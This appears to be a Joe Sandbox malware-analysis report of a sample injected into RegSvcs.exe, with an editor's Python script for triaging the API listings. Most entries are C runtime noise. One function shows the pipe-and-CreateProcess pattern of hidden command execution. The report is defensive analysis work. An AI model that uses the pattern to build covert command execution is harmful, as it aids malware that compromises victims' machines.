                                                      • Instruction ID: 1545e737f40d03c2a147906e889db0c95b9c198f752dabbe9d1e86782818eed4
                                                      • Opcode Fuzzy Hash: ff96371d1ae292d9ada91ddf3d5dd7d0aad5fd29b9590dea8af1e6d6e4db4c05
                                                      • Instruction Fuzzy Hash: 6F518FB1A003158BDB15CF55E8857AAB7F4FB48310F15846ACC05EB391E3B8DD50CBAA
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078), ref: 004427E0
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free$InfoLocale
                                                      • String ID:
                                                      • API String ID: 2003897158-0
                                                      • Opcode ID: add787d7845f4a774a03af30bae9e49826061530aecb263a1c1acf9e08ffd9be
                                                      • Instruction ID: 07d3857131a968de86a97c751e810957ba826f5a53c4075382b3af7cb9a32e65
                                                      • Opcode Fuzzy Hash: add787d7845f4a774a03af30bae9e49826061530aecb263a1c1acf9e08ffd9be
                                                      • Instruction Fuzzy Hash: A92186726101166BEB28AF15DD42A7F77A8EF44314F50417FFD01D6251EBB8DD408A58
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(00442539,00000001,00000000,?,-00000050,?,00442B67,00000000,?,?,?,00000055,?), ref: 00442485
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: e0d58fd9f92e47267dfe9193589d03fc88d9d93a5a080e76f54d0c721a2ebbce
                                                      • Instruction ID: d0ca285bb40b9cc27fd9487dcd8eeb86c864f581bf4f90510ef8df1d4546dc35
                                                      • Opcode Fuzzy Hash: e0d58fd9f92e47267dfe9193589d03fc88d9d93a5a080e76f54d0c721a2ebbce
                                                      • Instruction Fuzzy Hash: 1F118C3B2007019FEB189F39D8A167BB791FF80318B58442EF94687B40D3B5B802C744
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • GetLocaleInfoW.KERNEL32(?,20000001,?,00000002,?,00000000,?,?,00442755,00000000,00000000,?), ref: 004429E4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$InfoLocale
                                                      • String ID:
                                                      • API String ID: 3736152602-0
                                                      • Opcode ID: d2fe304e529daf8d3b897b426b2ff07608de749dc24f4138b1a974b2260efc35
                                                      • Instruction ID: 52a21ec650ff7c036804ae91de2c8b3d93aac10a0350f988173e5e01ba25c219
                                                      • Opcode Fuzzy Hash: d2fe304e529daf8d3b897b426b2ff07608de749dc24f4138b1a974b2260efc35
                                                      • Instruction Fuzzy Hash: 40F0A9326101167BEB345A25CD45BBB7754EB40754F55442AFD06B3380EAB8FD41C5E4
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E32
                                                        • Part of subcall function 00436DD0: _free.LIBCMT ref: 00436E68
                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00442375
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast_free$InfoLocale
                                                      • String ID: utf8$aE
                                                      • API String ID: 2003897158-399719714
                                                      • Opcode ID: aa57169f8023b9fd9dd72a25ef9c8c7edbfc890799864e4c4e1c76533f01937e
                                                      • Instruction ID: beb5681054ba013d59b30fc56a9405a7517dad23acb6f2410d214f7bb116928b
                                                      • Opcode Fuzzy Hash: aa57169f8023b9fd9dd72a25ef9c8c7edbfc890799864e4c4e1c76533f01937e
                                                      • Instruction Fuzzy Hash: 29F08132610115ABD714AF35DD45ABE73A8DF49314F11017EBA02D7281EAB8AD058658
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(0044278C,00000001,FFFFFFFF,?,-00000050,?,00442B2B,-00000050,?,?,?,00000055,?,-00000050,?,?), ref: 004424F8
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: b11d4a962aa4a2a0845aae4fea630016b8f5c5a8637a8f79b9017eceb009fff5
                                                      • Instruction ID: ed1eade6f59818560fa4daa2aac7664302146382423b6d12c41e9c9b2339d524
                                                      • Opcode Fuzzy Hash: b11d4a962aa4a2a0845aae4fea630016b8f5c5a8637a8f79b9017eceb009fff5
                                                      • Instruction Fuzzy Hash: 2EF0F6363003046FEB245F399D81A7B7B91EF81768F55842EF9058B690C6F59C41C798
                                                      APIs
                                                        • Part of subcall function 004326F0: EnterCriticalSection.KERNEL32(-000486C1,?,004339D5,00000000,00463F78,0000000C,0043399C,?,?,0043A7C3,?,?,00436F72,00000001,00000364,00000006), ref: 004326FF
                                                      • EnumSystemLocalesW.KERNEL32(004384AF,00000001,00464198,0000000C,004388DA,00000000), ref: 004384F4
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: CriticalEnterEnumLocalesSectionSystem
                                                      • String ID:
                                                      • API String ID: 1272433827-0
                                                      • Opcode ID: 3b5c1364d7cd50fc97924730aefc53fb116b642963b2c1bd3db03a2d45adce8f
                                                      • Instruction ID: 9fc24951d34fa790f1ec3895482986d9505c3f2fe49ddfb93487c91185536aab
                                                      • Opcode Fuzzy Hash: 3b5c1364d7cd50fc97924730aefc53fb116b642963b2c1bd3db03a2d45adce8f
                                                      • Instruction Fuzzy Hash: 8EF03C76A40300AFD704DF99E842B9D77F0EB49725F20406FF4119B2A1DBB989408F49
                                                      APIs
                                                        • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,00000000,?,00437BB7,?,00000000,00000000,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010), ref: 00436DD5
                                                        • Part of subcall function 00436DD0: SetLastError.KERNEL32(00000000,00000006,000000FF,?,00438071,00000000,00000000,00000000,00000000,8B18EC83,00464158,00000010,00431112,00000000,00000000,00000000), ref: 00436E73
                                                      • EnumSystemLocalesW.KERNEL32(00442321,00000001,FFFFFFFF,?,?,00442B89,-00000050,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 004423FF
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast$EnumLocalesSystem
                                                      • String ID:
                                                      • API String ID: 2417226690-0
                                                      • Opcode ID: d22d078ac6dda33add69cb47dc5f89e5addfa278ab2afe83675ca11ae6cb7b22
                                                      • Instruction ID: 99cdb45d3f9d3a368050452263ee8c929fb67b282bee9bca7be4151b212121f8
                                                      • Opcode Fuzzy Hash: d22d078ac6dda33add69cb47dc5f89e5addfa278ab2afe83675ca11ae6cb7b22
                                                      • Instruction Fuzzy Hash: E6F0E53A30020557DB04AF76D94576BBFA4EFC1714F47806AFE058B691C6F99882C7A4
                                                      APIs
                                                      • SetUnhandledExceptionFilter.KERNEL32(Function_0002A614,0042A128), ref: 0042A60D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ExceptionFilterUnhandled
                                                      • String ID:
                                                      • API String ID: 3192549508-0
                                                      • Opcode ID: 8d06b91f446ef99f71eebbec5f32996093cab5ca771a45d9879e521a318de171
                                                      • Instruction ID: 66bb6caa2bdd3c9d84d0cfa5364d01ae706cc903abfb3adfe59ca4624c321f28
                                                      • Opcode Fuzzy Hash: 8d06b91f446ef99f71eebbec5f32996093cab5ca771a45d9879e521a318de171
                                                      • Instruction Fuzzy Hash:
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: HeapProcess
                                                      • String ID:
                                                      • API String ID: 54951025-0
                                                      • Opcode ID: 42b51d29d7d43180ceb412ccadbdbd3d27969663646f8ef2e2f89b7d034a4083
                                                      • Instruction ID: 36067f364272004dc57d80dd1d131b4701be5925398dae7ba9ff77fe02776256
                                                      • Opcode Fuzzy Hash: 42b51d29d7d43180ceb412ccadbdbd3d27969663646f8ef2e2f89b7d034a4083
                                                      • Instruction Fuzzy Hash: 6FA012306002808F43404F345A0434935DC590058170400399004C4470E67088804705
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID:
                                                      • Opcode ID: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                      • Instruction ID: 2d736a212e789c36ec4e4cb68e3a434c63faf2050a836131c670e1bdff006d63
                                                      • Opcode Fuzzy Hash: 6847a3e9a0d7b7b8402b77278032b4f626891dfa6fd65570ac05521b0549e8d7
                                                      • Instruction Fuzzy Hash: A8E08C32911268EBCB14EB89C90498AF3FCEB48B04F26409BB911D3240C6B4DF00CBD4
                                                      APIs
                                                      • GetTempPathA.KERNEL32(00000080,?,?,?,?,?,?,?,?,?), ref: 0040832D
                                                      • CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00408403
                                                      • SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00408415
                                                      • Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00408459
                                                      • CreateProcessA.KERNEL32 ref: 00408481
                                                      • Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0040848F
                                                      • WaitForSingleObject.KERNEL32(?,00000064), ref: 004084B8
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004084DA
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 004084FE
                                                      • ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00408525
                                                      • PeekNamedPipe.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000), ref: 0040856A
                                                      • CloseHandle.KERNEL32(?), ref: 00408581
                                                      • CloseHandle.KERNEL32(?), ref: 00408589
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408591
                                                      • CloseHandle.KERNEL32(00000000), ref: 00408599
                                                      • GetLastError.KERNEL32 ref: 004085A3
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$ClosePipeWow64$NamedPeek$CreateRedirection$DisableErrorFileInformationLastObjectPathProcessReadRevertSingleTempWait
                                                      • String ID: D
                                                      • API String ID: 3215130363-2746444292
                                                      • Opcode ID: b28e023fe7403818ef6636384a56b0e5ae5600ff95b125a8a980114813b33f11
                                                      • Instruction ID: db226792efd7a5d372922a60c148993335caeddcf7fe3051bd97c46a50f1f8d9
                                                      • Opcode Fuzzy Hash: b28e023fe7403818ef6636384a56b0e5ae5600ff95b125a8a980114813b33f11
                                                      • Instruction Fuzzy Hash: 2AA18471940228ABEB20DF60DD45FDDB778AF44704F1041EAE908B62D1DB79AE84CF99
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$___from_strstr_to_strchr
                                                      • String ID:
                                                      • API String ID: 3409252457-0
                                                      • Opcode ID: 08ce1da051c5e4f6261c3375afccaddf4823e57bc503958558c9874a9af09999
                                                      • Instruction ID: ad342c85d79afc1525fb68db4781c9c5f11ba077349ec04d9f16d3b657b576c0
                                                      • Opcode Fuzzy Hash: 08ce1da051c5e4f6261c3375afccaddf4823e57bc503958558c9874a9af09999
                                                      • Instruction Fuzzy Hash: FED1E871900305AFEB21EFA5C885A6F77B8AF05314F04416FEB01A7381EBB99D11CB5A
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$Info
                                                      • String ID:
                                                      • API String ID: 2509303402-0
                                                      • Opcode ID: 995654ab384135b73c876c0ff2681754972dc2ee05fa6770e1ead01997c3bee8
                                                      • Instruction ID: 1214d5669b359a887c7051222f3a54922eff3f69e2c2072fa8b703e4a9e83790
                                                      • Opcode Fuzzy Hash: 995654ab384135b73c876c0ff2681754972dc2ee05fa6770e1ead01997c3bee8
                                                      • Instruction Fuzzy Hash: 33D18C71D003059FDB21CF69C982BAEBBB5BF1C304F14502EE899A7352DBB8A845CB54
                                                      APIs
                                                      • InitializeCriticalSectionAndSpinCount.KERNEL32(00468FA8,00000FA0,?,?,004299D8), ref: 00429A06
                                                      • GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004299D8), ref: 00429A11
                                                      • GetModuleHandleW.KERNEL32(kernel32.dll,?,?,004299D8), ref: 00429A22
                                                      • GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00429A34
                                                      • GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00429A42
                                                      • CreateEventW.KERNEL32(00000000,00000001,00000000,00000000,?,?,004299D8), ref: 00429A65
                                                      • DeleteCriticalSection.KERNEL32(00468FA8,00000007,?,?,004299D8), ref: 00429A81
                                                      • CloseHandle.KERNEL32(00000000,?,?,004299D8), ref: 00429A91
                                                      Strings
                                                      • WakeAllConditionVariable, xrefs: 00429A3A
                                                      • api-ms-win-core-synch-l1-2-0.dll, xrefs: 00429A0C
                                                      • SleepConditionVariableCS, xrefs: 00429A2E
                                                      • kernel32.dll, xrefs: 00429A1D
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: Handle$AddressCriticalModuleProcSection$CloseCountCreateDeleteEventInitializeSpin
                                                      • String ID: SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                      • API String ID: 2565136772-3242537097
                                                      • Opcode ID: cd77e9e22f7702d0e8c547e099c978fc9b8415150fa15de595efc219695d84d2
                                                      • Instruction ID: 7cf5ffcbd6923fcff546143913a6234c01ab752e32550092ccb2d7335f4584b8
                                                      • Opcode Fuzzy Hash: cd77e9e22f7702d0e8c547e099c978fc9b8415150fa15de595efc219695d84d2
                                                      • Instruction Fuzzy Hash: 5E019670B41361ABD7245B74BD09B1B3659AB55B92F24016BFC04D22A1EFB8CC00856E
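Two of the per-function API listings above are worth telling apart when triaging a report like this one. The function at ref 00408403 onwards (CreatePipe, SetHandleInformation, Wow64DisableWow64FsRedirection, CreateProcessA, PeekNamedPipe, ReadFile) has the shape of code that spawns a child process and drains its stdout through an anonymous pipe; the command line itself does not appear in the listing. The function at ref 00429A06 (InitializeCriticalSectionAndSpinCount, GetModuleHandleW on api-ms-win-core-synch-l1-2-0.dll, GetProcAddress for SleepConditionVariableCS and WakeAllConditionVariable) is MSVC runtime start-up code and, like the GetLocaleInfoW and EnumSystemLocalesW functions, is noise rather than malware behaviour. The script below is an added example written for this page, not Joe Sandbox or Amadey code: it parses listings in the bullet format used here (the regex is an assumption about that format) and applies the editor's own heuristics, not Joe Sandbox signatures, to label each function. The sample listings are copied from this report with argument lists abridged.

```python
"""Triage helper for the per-function "APIs" listings in this report.

Added example, not Joe Sandbox or Amadey code. Sample listings are copied from
this report (argument lists abridged); the pattern rules are the editor's own
heuristics, not Joe Sandbox signatures.
"""
import re
from dataclasses import dataclass
from typing import Optional

# '• Api.MODULE(args), ref: ADDR', optionally prefixed with 'Part of subcall function ADDR:'
API_LINE = re.compile(
    r"^\s*•\s*(?:Part of subcall function (?P<sub>[0-9A-Fa-f]+):\s*)?"
    r"(?P<name>[A-Za-z_][A-Za-z0-9_]*)\.(?P<module>[A-Za-z0-9_\-]+)"
    r"(?:\((?P<args>.*)\))?(?:,?\s*ref:\s*(?P<ref>[0-9A-Fa-f]+))?")

@dataclass
class ApiCall:
    name: str
    module: str
    args: list
    ref: Optional[str]
    subcall: Optional[str]  # callee address when the API is only reached through a subcall

def parse_api_lines(text: str) -> list:
    """Parse every API bullet in a block; unrelated lines are skipped."""
    calls = []
    for m in filter(None, map(API_LINE.match, text.splitlines())):
        args = [a.strip() for a in m["args"].split(",")] if m["args"] else []
        calls.append(ApiCall(m["name"], m["module"], args, m["ref"], m["sub"]))
    return calls

# APIs the MSVC runtime uses for start-up and locale handling; on their own they are noise.
CRT_RUNTIME_APIS = {
    "GetLocaleInfoW", "EnumSystemLocalesW", "IsProcessorFeaturePresent",
    "SetUnhandledExceptionFilter", "InitializeCriticalSectionAndSpinCount",
    "DeleteCriticalSection", "EnterCriticalSection", "CreateEventW", "GetModuleHandleW",
    "GetProcAddress", "CloseHandle", "GetLastError", "SetLastError", "HeapFree"}
# Symbols the runtime probes via GetProcAddress to pick a condition-variable implementation.
CRT_PROBED_SYMBOLS = {"SleepConditionVariableCS", "WakeAllConditionVariable"}

def resolved_symbols(calls: list) -> set:
    """Names passed as the second argument to GetProcAddress (resolved at run time)."""
    return {c.args[1] for c in calls if c.name == "GetProcAddress" and len(c.args) > 1}

def classify(block: str) -> dict:
    """Label one function's API listing; subcall entries are left out of the ordering check."""
    direct = [c for c in parse_api_lines(block) if c.subcall is None]
    names = [c.name for c in direct]

    def first(*candidates):
        return next((i for i, n in enumerate(names) if n in candidates), None)

    # Pipe created, child spawned, pipe drained: the "run a command and capture its
    # output" shape. Which command is run is not visible in the listing itself.
    i_pipe, i_proc = first("CreatePipe"), first("CreateProcessA", "CreateProcessW")
    i_read = first("PeekNamedPipe", "ReadFile")
    if None not in (i_pipe, i_proc, i_read) and i_pipe < i_proc < i_read:
        evidence = ["CreatePipe", names[i_proc], names[i_read]]
        # An inheritable handle and the FS-redirection bypass (32-bit code reaching the
        # real System32) strengthen the reading.
        evidence += [n for n in ("SetHandleInformation", "Wow64DisableWow64FsRedirection") if n in names]
        return {"verdict": "child-process-output-capture", "evidence": evidence}

    unknown = resolved_symbols(direct) - CRT_PROBED_SYMBOLS
    if unknown:  # GetProcAddress on anything outside the CRT probe set deserves a look
        return {"verdict": "dynamic-api-resolution", "evidence": sorted(unknown)}
    if direct and all(c.module == "LIBCMT" or c.name in CRT_RUNTIME_APIS for c in direct):
        return {"verdict": "crt-runtime-init", "evidence": sorted(set(names))}
    return {"verdict": "unclassified", "evidence": sorted(set(names))}

# Constructed sample input: three listings from this report, argument lists abridged.
PROCESS_CAPTURE_BLOCK = """\
• CreatePipe.KERNEL32(00000000,00000000,0000000C,00000000), ref: 00408403
• SetHandleInformation.KERNEL32(00000000,00000001,00000000), ref: 00408415
• Wow64DisableWow64FsRedirection.KERNEL32(?), ref: 00408459
• CreateProcessA.KERNEL32 ref: 00408481
• Wow64RevertWow64FsRedirection.KERNEL32(00000000), ref: 0040848F
• WaitForSingleObject.KERNEL32(?,00000064), ref: 004084B8
• PeekNamedPipe.KERNEL32(00000000,00000000,00000000), ref: 004084DA
• ReadFile.KERNEL32(00000000,?,0000007F,00000000,00000000), ref: 00408525
"""
CRT_SYNC_BLOCK = """\
• InitializeCriticalSectionAndSpinCount.KERNEL32(00468FA8,00000FA0), ref: 00429A06
• GetModuleHandleW.KERNEL32(api-ms-win-core-synch-l1-2-0.dll,?,?,004299D8), ref: 00429A11
• GetProcAddress.KERNEL32(00000000,SleepConditionVariableCS), ref: 00429A34
• GetProcAddress.KERNEL32(00000000,WakeAllConditionVariable), ref: 00429A42
• CreateEventW.KERNEL32(00000000,00000001,00000000,00000000), ref: 00429A65
"""
LOCALE_BLOCK = """\
  • Part of subcall function 00436DD0: GetLastError.KERNEL32(00000000,?,00437BB7), ref: 00436DD5
• GetLocaleInfoW.KERNEL32(?,20000001,?,00000002), ref: 004429E4
"""

if __name__ == "__main__":
    for label, block in (("00408403", PROCESS_CAPTURE_BLOCK), ("00429A06", CRT_SYNC_BLOCK),
                         ("004429E4", LOCALE_BLOCK)):
        print(label, classify(block))
```

The ordering check matters: CreatePipe, CreateProcess and a pipe read appearing in the same function in any order is weaker evidence than the pipe existing before the child is created and being drained afterwards. The crt-runtime-init label is deliberately narrow (every direct call must be in the CRT set, and GetProcAddress may only resolve the two condition-variable probes); a GetProcAddress on any other export falls through to dynamic-api-resolution so it is not silently filed as noise.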
                                                      APIs
                                                      • ___free_lconv_mon.LIBCMT ref: 00441751
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A24
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A36
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A48
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A5A
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A6C
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A7E
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440A90
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AA2
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AB4
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AC6
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AD8
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AEA
                                                        • Part of subcall function 00440A07: _free.LIBCMT ref: 00440AFC
                                                      • _free.LIBCMT ref: 00441746
                                                        • Part of subcall function 004381B6: HeapFree.KERNEL32(00000000,00000000,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?), ref: 004381CC
                                                        • Part of subcall function 004381B6: GetLastError.KERNEL32(?,?,0044115C,?,00000000,?,8B18EC83,?,004413FF,?,00000007,?,?,004418A4,?,?), ref: 004381DE
                                                      • _free.LIBCMT ref: 00441768
                                                      • _free.LIBCMT ref: 0044177D
                                                      • _free.LIBCMT ref: 00441788
                                                      • _free.LIBCMT ref: 004417AA
                                                      • _free.LIBCMT ref: 004417BD
                                                      • _free.LIBCMT ref: 004417CB
                                                      • _free.LIBCMT ref: 004417D6
                                                      • _free.LIBCMT ref: 0044180E
                                                      • _free.LIBCMT ref: 00441815
                                                      • _free.LIBCMT ref: 00441832
                                                      • _free.LIBCMT ref: 0044184A
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free$ErrorFreeHeapLast___free_lconv_mon
                                                      • String ID:
                                                      • API String ID: 161543041-0
                                                      APIs
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: _free
                                                      • String ID:
                                                      • API String ID: 269201875-0
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID:
                                                      • String ID:
                                                      • API String ID: 0-3907804496
                                                      APIs
                                                        • Part of subcall function 00443758: CreateFileW.KERNEL32(00000000,?,?,H;D,?,?,00000000,?,00443B48,00000000,0000000C), ref: 00443775
                                                      • GetLastError.KERNEL32 ref: 00443BB3
                                                      • __dosmaperr.LIBCMT ref: 00443BBA
                                                      • GetFileType.KERNEL32(00000000), ref: 00443BC6
                                                      • GetLastError.KERNEL32 ref: 00443BD0
                                                      • __dosmaperr.LIBCMT ref: 00443BD9
                                                      • CloseHandle.KERNEL32(00000000), ref: 00443BF9
                                                      • CloseHandle.KERNEL32(004373F1), ref: 00443D46
                                                      • GetLastError.KERNEL32 ref: 00443D78
                                                      • __dosmaperr.LIBCMT ref: 00443D7F
                                                      Strings
                                                      Memory Dump Source
                                                      • Source File: 00000003.00000002.4126769317.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                      Joe Sandbox IDA Plugin
                                                      • Snapshot File: hcaresult_3_2_400000_RegSvcs.jbxd
                                                      Yara matches
                                                      Similarity
                                                      • API ID: ErrorLast__dosmaperr$CloseFileHandle$CreateType
                                                      • String ID: H
                                                      • API String ID: 4237864984-2852464175
                                                      APIs
                                                      Strings
                                                      Memory Dump Source
